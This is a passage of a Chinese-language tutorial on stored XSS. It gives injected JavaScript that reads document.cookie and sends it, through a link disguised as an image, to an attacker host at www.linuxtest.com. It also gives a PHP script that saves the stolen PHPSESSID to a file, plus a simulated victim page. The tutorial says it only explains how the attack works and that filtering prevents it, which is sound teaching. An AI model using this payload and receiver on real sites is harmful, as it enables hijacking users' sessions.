3、恶意攻击者插入相应代码
  1 <script>
  2 var Str=document.cookie;               //获取cookie
  3 var a =document.createElement('a');        //创建a标签
  4 a.href='http://www.linuxtest.com/test2.php?'+Str;   //攻击者主机
  5 a.innerHTML="<img src='./aa.jpg'>";        //掩护图片
  6 document.body.appendChild(a);              //将标签添加到页面中
  7 </script>
  4、数据(攻击代码)插入数据库
  5、攻击者控制的主机中设置接收盗取的cookie
  1 <?php
  2 header("content-type:text/html;charset=utf8");
  3 echo "你的PHPSESSID被盗啦";
  4 echo "<pre>";
  5 print_r($_GET);
  6 echo "</pre>";
  7 $cookie=$_GET['PHPSESSID'];
  8 file_put_contents('./xss.txt', $cookie);
  9 ?>
  开始模拟测试
  1、test88.com中设置生成sessionID代码
  1 <?php
  2 session_start();
  3 $_SESSION['xss']='xssssss';
  4 echo "<pre>";
  5 print_r($_SESSION);
  6 echo "</pre>";die;
  7 ?>
  2、客户端访问上面代码并生成自己的sessionID
  3、客户端访问xss.html
  #下面为模拟被攻击后取出数据的xss.html代码(显示数据)
  1 <!DOCTYPE html>
  2 <html>
  3 <head>
  4     <title>xss攻击</title>
  5     <meta charset="utf-8">
  6 </head>
  7 <body>
  8 <form action="./test99.php" method="post">
  9 留言:<input type="text" name="content" value=""><br/>
  10 <input type="submit" name="" value='提交'>
  11 </form>
  12 <br/>留言记录:<br/>
  13 <script>
  14 var Str=document.cookie;               //获取cookie
  15 var a =document.createElement('a');        //创建a标签
  16 a.href='http://www.linuxtest.com/test2.php?'+Str;   //攻击者主机
  17 a.innerHTML="<img src='./aa.jpg'>";        //掩护图片
  18 document.body.appendChild(a);              //将标签添加到页面中
  19 </script>
  20 </body>
  21 </html>
  4、客户端不小心点击到图片,sessionID将被盗


  # vi xss.txt

  【当然这仅仅只是一个很简单的攻击,只要将数据过滤可以避免这个攻击了,这里只是让大家了解XSS是如何进行攻击的。】